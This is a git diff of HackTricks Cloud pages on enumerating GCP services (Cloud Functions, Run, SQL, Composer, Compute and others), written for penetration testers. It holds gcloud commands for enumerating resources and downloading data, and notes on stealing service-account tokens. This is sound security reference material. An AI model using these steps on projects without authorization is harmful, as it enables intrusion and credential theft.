+# List all worker-pools
+regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
+for region in $regions; do
+    echo "Listing build worker-pools in region: $region"
+    gcloud builds worker-pools list --region="$region"
+    echo "-----------------------------------------"
+done
+```
+
+### Privilege Escalation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-cloudbuild-privesc.md
+{{#endref}}
+
+### Unauthenticated Access
+
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md
new file mode 100644
index 000000000..6e808a158
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md
@@ -0,0 +1,108 @@
+# GCP - Cloud Functions Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Functions 
+
+[Google Cloud Functions](https://cloud.google.com/functions/) are designed to host your code, which **gets executed in response to events**, without necessitating the management of a host operating system. Additionally, these functions support the storage of environment variables, which the code can utilize.
+
+### Storage
+
+The Cloud Functions **code is stored in GCP Storage**. Therefore, anyone with **read access over buckets** in GCP is going to be able to **read the Cloud Functions code**.\
+The code is stored in a bucket like one of the following:
+
+- `gcf-sources--/-/version-/function-source.zip`
+- `gcf-v2-sources--/function-source.zip`
+
+For example:\
+`gcf-sources-645468741258-us-central1/function-1-003dcbdf-32e1-430f-a5ff-785a6e238c76/version-4/function-source.zip`
+
+> [!WARNING]
+> Any user with **read privileges over the bucket** storing the Cloud Function could **read the executed code**.
+
+### Artifact Registry
+
+If the cloud function is configured so the executed Docker container is stored inside and Artifact Registry repo inside the project, anyway with read access over the repo will be able to download the image and check the source code. For more info check:
+
+{{#ref}}
+gcp-artifact-registry-enum.md
+{{#endref}}
+
+### SA
+
+If not specified, by default the **App Engine Default Service Account** with **Editor permissions** over the project will be attached to the Cloud Function.
+
+### Triggers, URL & Authentication
+
+When a Cloud Function is created the **trigger** needs to be specified. One common one is **HTTPS**, this will **create an URL where the function** can be triggered via web browsing.\
+Other triggers are pub/sub, Storage, Filestore...
+
+The URL format is **`https://-.cloudfunctions.net/`**
+
+When the HTTPS tigger is used, it's also indicated if the **caller needs to have IAM authorization** to call the Function or if **everyone** can just call it:
+
+

+
+### Inside the Cloud Function
+
+The code is **downloaded inside** the folder **`/workspace`** with the same file names as the ones the files have in the Cloud Function and is executed with the user `www-data`.\
+The disk **isn't mounted as read-only.**
+
+### Enumeration
+
+```bash
+# List functions
+gcloud functions list
+gcloud functions describe  # Check triggers to see how is this function invoked
+gcloud functions get-iam-policy 
+
+# Get logs of previous runs. By default, limits to 10 lines
+gcloud functions logs read  --limit [NUMBER]
+
+# Call a function
+curl https://-.cloudfunctions.net/
+gcloud functions call  --data='{"message": "Hello World!"}'
+
+# If you know the name of projects you could try to BF cloud functions names
+
+# Get events that could be used to trigger a cloud function
+gcloud functions event-types list
+
+# Access function with authentication
+curl -X POST https://-.cloudfunctions.net/ \
+-H "Authorization: bearer $(gcloud auth print-identity-token)" \
+-H "Content-Type: application/json" \
+-d '{}'
+```
+
+### Privilege Escalation
+
+In the following page, you can check how to **abuse cloud function permissions to escalate privileges**:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md
+{{#endref}}
+
+### Unauthenticated Access
+
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-cloud-functions-persistence.md
+{{#endref}}
+
+## References
+
+- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md
new file mode 100644
index 000000000..49b68e259
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md
@@ -0,0 +1,111 @@
+# GCP - Cloud Run Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Cloud Run 
+
+Cloud Run is a serverless managed compute platform that lets you **run containers** directly on top of Google's scalable infrastructure.
+
+You can run your container or If you're using Go, Node.js, Python, Java, .NET Core, or Ruby, you can use the [source-based deployment](https://cloud.google.com/run/docs/deploying-source-code) option that **builds the container for you.**
+
+Google has built Cloud Run to **work well together with other services on Google Cloud**, so you can build full-featured applications.
+
+### Services and jobs 
+
+On Cloud Run, your code can either run continuously as a _**service**_ or as a _**job**_. Both services and jobs run in the same environment and can use the same integrations with other services on Google Cloud.
+
+- **Cloud Run services.** Used to run code that responds to web requests, or events.
+- **Cloud Run jobs.** Used to run code that performs work (a job) and quits when the work is done.
+
+## Cloud Run Service
+
+Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080 inside the container by default, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response.
+
+### Relevant details
+
+- By **default**, the **access** to the web server is **public**, but it can also be **limited to internal traffic** (VPC...)\
+  Moreover, the **authentication** to contact the web server can be **allowing all** or to **require authentication via IAM**.
+- By default, the **encryption** uses a **Google managed key**, but a **CMEK** (Customer Managed Encryption Key) from **KMS** can also be **chosen**.
+- By **default**, the **service account** used is the **Compute Engine default one** which has **Editor** access over the project and it has the **scope `cloud-platform`.**
+- It's possible to define **clear-text environment variables** for the execution, and even **mount cloud secrets** or **add cloud secrets to environment variables.**
+- It's also possible to **add connections with Cloud SQL** and **mount a file system.**
+- The **URLs** of the services deployed are similar to **`https://-.a.run.app`**
+- A Run Service can have **more than 1 version or revision**, and **split traffic** among several revisions.
+
+### Enumeration
+
+```bash
+# List services
+gcloud run services list
+gcloud run services list --platform=managed
+gcloud run services list --platform=gke
+
+# Get info of a service
+gcloud run services describe --region  
+
+# Get info of all the services together
+gcloud run services list --format=yaml
+gcloud run services list --platform=managed --format=json
+gcloud run services list --platform=gke --format=json
+
+# Get policy
+gcloud run services get-iam-policy --region  
+
+# Get revisions
+gcloud run revisions list --region 
+gcloud run revisions describe --region  
+
+# Get domains
+gcloud run domain-mappings list
+gcloud run domain-mappings describe 
+
+# Attempt to trigger a job unauthenticated
+curl 
+
+# Attempt to trigger a job with your current gcloud authorization
+curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" 
+```
+
+## Cloud Run Jobs
+
+Cloud Run jobs are be a better fit for **containers that run to completion and don't serve requests**. Jobs don't have the ability to serve requests or listen on a port. This means that unlike Cloud Run services, jobs should not bundle a web server. Instead, jobs containers should exit when they are done.
+
+### Enumeration
+
+```bash
+gcloud beta run jobs list
+gcloud beta run jobs describe --region  
+gcloud beta run jobs get-iam-policy --region  
+```
+
+## Privilege Escalation
+
+In the following page, you can check how to **abuse cloud run permissions to escalate privileges**:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-run-privesc.md
+{{#endref}}
+
+## Unauthenticated Access
+
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md
+{{#endref}}
+
+## Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md
+{{#endref}}
+
+## Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-cloud-run-persistence.md
+{{#endref}}
+
+## References
+
+- [https://cloud.google.com/run/docs/overview/what-is-cloud-run](https://cloud.google.com/run/docs/overview/what-is-cloud-run)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md
new file mode 100644
index 000000000..71d199dc8
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md
@@ -0,0 +1,46 @@
+# GCP - Cloud Scheduler Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Google Cloud Scheduler is a fully managed **cron job service** that allows you to run arbitrary jobs—such as batch, big data jobs, cloud infrastructure operations—at fixed times, dates, or intervals. It is integrated with Google Cloud services, providing a way to **automate various tasks like updates or batch processing on a regular schedule**.
+
+Although from an offensive point of view this sounds amazing, it actually isn't that interesting because the service just allow to schedule certain simple actions at a certain time and not to execute arbitrary code.
+
+At the moment of this writing these are the actions this service allows to schedule:
+
+

+
+- **HTTP**: Send an HTTP request defining the headers and body of the request.
+- **Pub/Sub**: Send a message into an specific topic
+- **App Engine HTTP**: Send an HTTP request to an app built in App Engine
+- **Workflows**: Call a GCP Workflow.
+
+## Service Accounts
+
+A service account is not always required by each scheduler. The **Pub/Sub** and **App Engine HTTP** types don't require any service account. The **Workflow** does require a service account, but it'll just invoke the workflow.\
+Finally, the regular HTTP type doesn't require a service account, but it's possible to indicate that some kind of auth is required by the workflow and add either an **OAuth token or an OIDC token to the sent** HTTP request.
+
+> [!CAUTION]
+> Therefore, it's possible to steal the **OIDC** token and abuse the **OAuth** token from service accounts **abusing the HTTP type**. More on this in the privilege escalation page.
+
+Note that it's possible to limit the scope of the OAuth token sent, however, by default, it'll be `cloud-platform`.
+
+## Enumeration
+
+```bash
+# Get schedulers in a location
+gcloud scheduler jobs list --location us-central1
+
+# Get information of an specific scheduler
+gcloud scheduler jobs describe --location us-central1 
+```
+
+## Privilege Escalation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md
new file mode 100644
index 000000000..38133aa99
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md
@@ -0,0 +1,28 @@
+# GCP - Cloud Shell Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Google Cloud Shell is an interactive shell environment for Google Cloud Platform (GCP) that provides you with **command-line access to your GCP resources directly from your browser or shell**. It's a managed service provided by Google, and it comes with a **pre-installed set of tools**, making it easier to manage your GCP resources without having to install and configure these tools on your local machine.\
+Moreover, its offered at **no additional cost.**
+
+**Any user of the organization** (Workspace) is able to execute **`gcloud cloud-shell ssh`** and get access to his **cloudshell** environment. However, **Service Accounts can't**, even if they are owner of the organization.
+
+There **aren't** **permissions** assigned to this service, therefore the **aren't privilege escalation techniques**. Also there **isn't any kind of enumeration**.
+
+Note that Cloud Shell can be **easily disabled** for the organization.
+
+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-cloud-shell-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
new file mode 100644
index 000000000..1b6cd0392
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md
@@ -0,0 +1,89 @@
+# GCP - Cloud SQL Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+Google Cloud SQL is a managed service that **simplifies setting up, maintaining, and administering relational databases** like MySQL, PostgreSQL, and SQL Server on Google Cloud Platform, removing the need to handle tasks like hardware provisioning, database setup, patching, and backups.
+
+Key features of Google Cloud SQL include:
+
+1. **Fully Managed**: Google Cloud SQL is a fully-managed service, meaning that Google handles database maintenance tasks like patching, updates, backups, and configuration.
+2. **Scalability**: It provides the ability to scale your database's storage capacity and compute resources, often without downtime.
+3. **High Availability**: Offers high availability configurations, ensuring your database services are reliable and can withstand zone or instance failures.
+4. **Security**: Provides robust security features like data encryption, Identity and Access Management (IAM) controls, and network isolation using private IPs and VPC.
+5. **Backups and Recovery**: Supports automatic backups and point-in-time recovery, helping you safeguard and restore your data.
+6. **Integration**: Seamlessly integrates with other Google Cloud services, providing a comprehensive solution for building, deploying, and managing applications.
+7. **Performance**: Offers performance metrics and diagnostics to monitor, troubleshoot, and improve database performance.
+
+### Password
+
+In the web console Cloud SQL allows the user to **set** the **password** of the database, there also a generate feature, but most importantly, **MySQL** allows to **leave an empty password and all of them allows to set as password just the char "a":**
+
+

+
+It's also possible to configure a password policy requiring **length**, **complexity**, **disabling reuse** and **disabling username in password**. All are disabled by default.
+
+**SQL Server** can be configured with **Active Directory Authentication**.
+
+### Zone Availability
+
+The database can be **available in 1 zone or in multiple**, of course, it's recommended to have important databases in multiple zones.
+
+### Encryption
+
+By default a Google-managed encryption key is used, but it's also **possible to select a Customer-managed encryption key (CMEK)**.
+
+### Connections
+
+- **Private IP**: Indicate the VPC network and the database will get an private IP inside the network
+- **Public IP**: The database will get a public IP, but by default no-one will be able to connect
+  - **Authorized networks**: Indicate public **IP ranges that should be allowed** to connect to the database
+- **Private Path**: If the DB is connected in some VPC, it's possible to enable this option and give **other GCP services like BigQuery access over it**
+
+

+
+### Data Protection
+
+- **Daily backups**: Perform automatic daily backups and indicate the number of backups you want to maintain.
+- **Point-in-time recovery**: Allows you to recover data from a specific point in time, down to a fraction of a second.
+- **Deletion Protection**: If enabled, the DB won't be able to be deleted until this feature is disabled
+
+### Enumeration
+
+```bash
+# Get SQL instances
+gcloud sql instances list
+gcloud sql instances describe  # get IPs, CACert, settings
+
+# Get database names inside an instance (like information_schema, sys...)
+gcloud sql databases list --instance 
+gcloud sql databases describe  --instance 
+
+# Get usernames inside the db instance
+gcloud sql users list --instance 
+
+# Backups
+gcloud sql backups list --instance 
+gcloud sql backups describe  --instance 
+```
+
+### Unauthenticated Enum
+
+{{#ref}}
+../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-cloud-sql-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md
new file mode 100644
index 000000000..4abb9e39a
--- /dev/null
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md
@@ -0,0 +1,43 @@
+# GCP - Composer Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+**Google Cloud Composer** is a fully managed **workflow orchestration service** built on **Apache Airflow**. It enables you to author, schedule, and monitor pipelines that span across clouds and on-premises data centers. With GCP Composer, you can easily integrate your workflows with other Google Cloud services, facilitating efficient data integration and analysis tasks. This service is designed to simplify the complexity of managing cloud-based data workflows, making it a valuable tool for data engineers and developers handling large-scale data processing tasks.
+
+### Enumeration
+
+```bash
+# Get envs info
+gcloud composer environments list --locations 
+gcloud composer environments describe --location  
+
+# Get list of dags
+gcloud composer environments storage dags list --environment  --location 
+# Download dags code
+mkdir /tmp/dags
+gcloud composer environments storage dags export --environment  --location  --destination /tmp/dags
+
+# List Data from composer
+gcloud composer environments storage data list --environment  --location 
+# Download data
+mkdir /tmp/data
+gcloud composer environments storage data export --environment  --location  --destination /tmp/data
+
+# List Plugins from composer
+gcloud composer environments storage plugins list --environment  --location 
+# Download plugins
+mkdir /tmp/plugins
+gcloud composer environments storage data export --environment  --location  --destination /tmp/plugins
+```
+
+### Privesc
+
+In the following page you can check how to **abuse composer permissions to escalate privileges**:
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-composer-privesc.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md
similarity index 63%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md
index d1a085958..db56d94df 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md
@@ -1,31 +1,17 @@
 # GCP - Compute Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## GCP VPC & Networking
 
 Learn about how this works in:
 
-{% content-ref url="gcp-vpc-and-networking.md" %}
-[gcp-vpc-and-networking.md](gcp-vpc-and-networking.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-vpc-and-networking.md
+{{#endref}}
 
 ### Enumeration
 
-{% code overflow="wrap" %}
 ```bash
 # List networks
 gcloud compute networks list
@@ -63,17 +49,16 @@ gcloud compute network-firewall-policies list
 ## Get final FWs applied in a region
 gcloud compute network-firewall-policies get-effective-firewalls --network= --region 
 ```
-{% endcode %}
 
-You easily find compute instances with open firewall rules with [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_firewall\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum)
+You easily find compute instances with open firewall rules with [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum)
 
 ## Compute instances
 
 This is the way you can **run virtual machines inside GCP.** Check this page for more information:
 
-{% content-ref url="gcp-compute-instance.md" %}
-[gcp-compute-instance.md](gcp-compute-instance.md)
-{% endcontent-ref %}
+{{#ref}}
+gcp-compute-instance.md
+{{#endref}}
 
 ### Enumeration
 
@@ -98,35 +83,35 @@ gcloud compute disks get-iam-policy 
 
 For more information about how to **SSH** or **modify the metadata** of an instance to **escalate privileges,** check this page:
 
-{% content-ref url="../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md" %}
-[gcp-local-privilege-escalation-ssh-pivoting.md](../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md)
-{% endcontent-ref %}
+{{#ref}}
+../../gcp-privilege-escalation/gcp-local-privilege-escalation-ssh-pivoting.md
+{{#endref}}
 
 ### Privilege Escalation
 
 In the following page, you can check how to **abuse compute permissions to escalate privileges**:
 
-{% content-ref url="../../gcp-privilege-escalation/gcp-compute-privesc/" %}
-[gcp-compute-privesc](../../gcp-privilege-escalation/gcp-compute-privesc/)
-{% endcontent-ref %}
+{{#ref}}
+../../gcp-privilege-escalation/gcp-compute-privesc/
+{{#endref}}
 
 ### Unauthenticated Enum
 
-{% content-ref url="../../gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md" %}
-[gcp-compute-unauthenticated-enum.md](../../gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md)
-{% endcontent-ref %}
+{{#ref}}
+../../gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
+{{#endref}}
 
 ### Post Exploitation
 
-{% content-ref url="../../gcp-post-exploitation/gcp-compute-post-exploitation.md" %}
-[gcp-compute-post-exploitation.md](../../gcp-post-exploitation/gcp-compute-post-exploitation.md)
-{% endcontent-ref %}
+{{#ref}}
+../../gcp-post-exploitation/gcp-compute-post-exploitation.md
+{{#endref}}
 
 ### Persistence
 
-{% content-ref url="../../gcp-persistence/gcp-compute-persistence.md" %}
-[gcp-compute-persistence.md](../../gcp-persistence/gcp-compute-persistence.md)
-{% endcontent-ref %}
+{{#ref}}
+../../gcp-persistence/gcp-compute-persistence.md
+{{#endref}}
 
 ## Serial Console Logs
 
@@ -158,12 +143,11 @@ The OS Configuration management feature allows you to define configuration polic
 
 This also allow to login in instances via IAM permissions, so it's very **useful for privesc and pivoting**.
 
-{% hint style="warning" %}
-In order to **enable os-config in a whole project or in an instance** you just need to set the **metadata** key **`enable-oslogin`** to **`true`** at the desired level.\
-Moreover, you can set the metadata **`enable-oslogin-2fa`** to **`true`** to enable the 2fa.
-
-When you enable it when crating an instance the metadata keys will be automatically set.
-{% endhint %}
+> [!WARNING]
+> In order to **enable os-config in a whole project or in an instance** you just need to set the **metadata** key **`enable-oslogin`** to **`true`** at the desired level.\
+> Moreover, you can set the metadata **`enable-oslogin-2fa`** to **`true`** to enable the 2fa.
+>
+> When you enable it when crating an instance the metadata keys will be automatically set.
 
 More about **2fa in OS-config**, **it only applies if the user is a user**, if it's a SA (like the compute SA) it won't require anything extra.
 
@@ -189,20 +173,18 @@ When an image is created you can choose **3 types of encryption**: Using **Googl
 
 You can query the list of non-standard images in a project with the following command:
 
-{% code overflow="wrap" %}
 ```bash
 gcloud compute machine-images list
 gcloud compute machine-images describe 
 gcloud compute machine-images get-iam-policy 
 ```
-{% endcode %}
 
 You can then [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
 
 ```bash
 gcloud compute images export --image test-image \
     --export-format qcow2 --destination-uri [BUCKET]
-    
+
 # Execute container inside a docker
 docker run --rm -ti gcr.io//secret:v1 sh
 ```
@@ -244,19 +226,6 @@ Check the Compute Instances privilege escalation section.
 
 ## References
 
-* [https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching)
+- [https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching](https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching)
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md
similarity index 52%
rename from pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md
rename to src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md
index 89929b36a..3e3ead129 100644
--- a/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md
+++ b/src/pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md
@@ -1,19 +1,6 @@
 # GCP - Compute Instances
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -29,10 +16,10 @@ To run a Confidential VM it might need to **change** things like the **type** of
 
 It's possible to **select the disk** to use or **create a new one**. If you select a new one you can:
 
-* Select the **size** of the disk
-* Select the **OS**
-* Indicate if you want to **delete the disk when the instance is deleted**
-* **Encryption**: By **default** a **Google managed key** will be used, but you can also **select a key from KMS** or indicate **raw key to use**.
+- Select the **size** of the disk
+- Select the **OS**
+- Indicate if you want to **delete the disk when the instance is deleted**
+- **Encryption**: By **default** a **Google managed key** will be used, but you can also **select a key from KMS** or indicate **raw key to use**.
 
 ### Deploy Container
 
@@ -46,36 +33,36 @@ This service account has **Editor role over the whole project (high privileges).
 
 And the **default access scopes** are the following:
 
-* **https://www.googleapis.com/auth/devstorage.read\_only** -- Read access to buckets :)
-* https://www.googleapis.com/auth/logging.write
-* https://www.googleapis.com/auth/monitoring.write
-* https://www.googleapis.com/auth/servicecontrol
-* https://www.googleapis.com/auth/service.management.readonly
-* https://www.googleapis.com/auth/trace.append
+- **https://www.googleapis.com/auth/devstorage.read\_only** -- Read access to buckets :)
+- https://www.googleapis.com/auth/logging.write
+- https://www.googleapis.com/auth/monitoring.write
+- https://www.googleapis.com/auth/servicecontrol
+- https://www.googleapis.com/auth/service.management.readonly
+- https://www.googleapis.com/auth/trace.append
 
 However, it's possible to **grant it `cloud-platform` with a click** or specify **custom ones**.
 
-

+

 
 ### Firewall
 
 It's possible to allow HTTP and HTTPS traffic.
 
-

+

 
 ### Networking
 
-* **IP Forwarding**: It's possible to **enable IP forwarding** from the creation of the instance.
-* **Hostname**: It's possible to give the instance a permanent hostname.
-* **Interface**: It's possible to add a network interface
+- **IP Forwarding**: It's possible to **enable IP forwarding** from the creation of the instance.
+- **Hostname**: It's possible to give the instance a permanent hostname.
+- **Interface**: It's possible to add a network interface
 
 ### Extra Security
 
 These options will **increase the security** of the VM and are recommended:
 
-* **Secure boot:** Secure boot helps protect your VM instances against boot-level and kernel-level malware and rootkits.
-* **Enable vTPM:** Virtual Trusted Platform Module (vTPM) validates your guest VM pre-boot and boot integrity, and offers key generation and protection.
-* **Integrity supervision:** Integrity monitoring lets you monitor and verify the runtime boot integrity of your shielded VM instances using Stackdriver reports. Requires vTPM to be enabled.
+- **Secure boot:** Secure boot helps protect your VM instances against boot-level and kernel-level malware and rootkits.
+- **Enable vTPM:** Virtual Trusted Platform Module (vTPM) validates your guest VM pre-boot and boot integrity, and offers key generation and protection.
+- **Integrity supervision:** Integrity monitoring lets you monitor and verify the runtime boot integrity of your shielded VM instances using Stackdriver reports. Requires vTPM to be enabled.
 
 ### VM Access
 
@@ -83,7 +70,7 @@ The common way to enable access to the VM is by **allowing certain SSH public ke
 However, it's also possible to **enable the access to the VM vial `os-config` service using IAM**. Moreover, it's possible to enable 2FA to access the VM using this service.\
 When this **service** is **enabled**, the access via **SSH keys is disabled.**
 
-

+

 
 ### Metadata
 
@@ -103,25 +90,14 @@ curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?re
 
 Moreover, **auth token for the attached service account** and **general info** about the instance, network and project is also going to be available from the **metadata endpoint**. For more info check:
 
-{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440" %}
+{{#ref}}
+https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#6440
+{{#endref}}
 
 ### Encryption
 
 A Google-managed encryption key is used by default a but a Customer-managed encryption key (CMEK) can be configured. You can also configure what to do when the used CMEF is revoked: Noting or shut down the VM.
 
-

+

 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
